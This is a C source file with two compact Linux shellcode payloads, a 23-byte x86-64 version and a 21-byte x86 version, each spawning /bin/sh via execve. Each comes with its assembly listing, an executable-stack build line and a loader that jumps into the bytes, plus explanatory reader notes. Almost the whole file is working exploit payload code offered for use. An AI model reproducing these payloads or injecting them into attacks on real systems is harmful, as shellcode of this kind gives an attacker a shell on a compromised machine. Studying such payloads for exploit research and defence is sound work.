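/* ===================================================================== */
/* Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)           */
/* file: push64.c (per the build line recorded by the author below)      */
/* ===================================================================== */

/*
# Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 27 April 2015
#
# GPL
#

.global _start
_start:
    # char *const argv[]
    xorl %esi, %esi

    # 'h' 's' '/' '/' 'n' 'i' 'b' '/'
    movq $0x68732f2f6e69622f, %rbx

    # for '\x00'
    pushq %rsi
    pushq %rbx

    pushq %rsp
    # const char *filename
    popq %rdi

    # __NR_execve 59
    pushq $59
    popq %rax

    # char *const envp[]
    xorl %edx, %edx

    syscall
*/

/*
gcc -z execstack push64.c
uname -r
3.19.3-3-ARCH
*/

#include <stdio.h>
#include <string.h>

/*
 * Loader the author used to exercise the byte string.
 *
 * It prints the length seen by strlen() and then transfers control into
 * the buffer. The printed value equals the advertised 23 only when the
 * string holds no embedded 0x00 byte (strlen() stops at the first one),
 * which is why the assembly above sources its zero bytes from registers
 * rather than immediates.
 *
 * Reader notes:
 *  - `shellcode` points at a string literal, i.e. into the binary's
 *    read-only data, not the stack. Whether that mapping is executable
 *    depends on how the toolchain and kernel treat the `-z execstack`
 *    flag on the build line above; the author records kernel 3.19.3-3-ARCH.
 *    On a system that enforces W^X the indirect call faults instead.
 *  - Converting an object pointer to a function pointer is not defined by
 *    ISO C; GCC accepts the cast as an extension, which is what the
 *    original relied on.
 *  - strlen() returns size_t, so `%zu` is the matching conversion.
 *
 * Returns 0 if the indirect call ever returns (execve replaces the
 * process image on success, so normally it does not).
 */
int main(void)
{
    const char *shellcode =
        "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53"
        "\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";

    printf("strlen(shellcode)=%zu\n", strlen(shellcode));

    /* Jump into the byte string; see the reader notes above. */
    ((void (*)(void))shellcode)();

    return 0;
}

/* ===================================================================== */
/* Linux x86 - Execve /bin/sh Shellcode Via Push (21 bytes)              */
/* file: push.c (per the build line recorded by the author below)        */
/* ===================================================================== */

/*
# Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes)
#
# Dying to be the shortest.
#
# Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
#
# 18 February 2015
#
# GPL
#

.global _start
_start:
    # char *const argv[]
    xorl %ecx, %ecx

    # 2 bytes, and both %eax and %edx were zeroed
    mull %ecx

    # __NR_execve 11
    movb $11, %al

    # for '\x00'
    pushl %ecx

    # 'h' 's' '/' '/'
    pushl $0x68732f2f

    # 'n' 'i' 'b' '/'
    pushl $0x6e69622f

    # const char *filename
    movl %esp, %ebx

    int $0x80
*/

/*
gcc -z execstack -m32 push.c
uname -r
3.19.3-3-ARCH
*/

#include <stdio.h>
#include <string.h>

/*
 * Same loader as push64.c, built for 32-bit (-m32) with the 21-byte
 * variant above.
 *
 * The strlen() printout serves the same purpose: it confirms the string
 * contains no embedded 0x00 byte that would truncate it. The executable-
 * memory and function-pointer-cast caveats from the 64-bit loader apply
 * unchanged here.
 *
 * Returns 0 if the indirect call ever returns.
 */
int main(void)
{
    const char *shellcode =
        "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
        "\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

    printf("strlen(shellcode)=%zu\n", strlen(shellcode));

    /* Jump into the byte string; see the notes above. */
    ((void (*)(void))shellcode)();

    return 0;
}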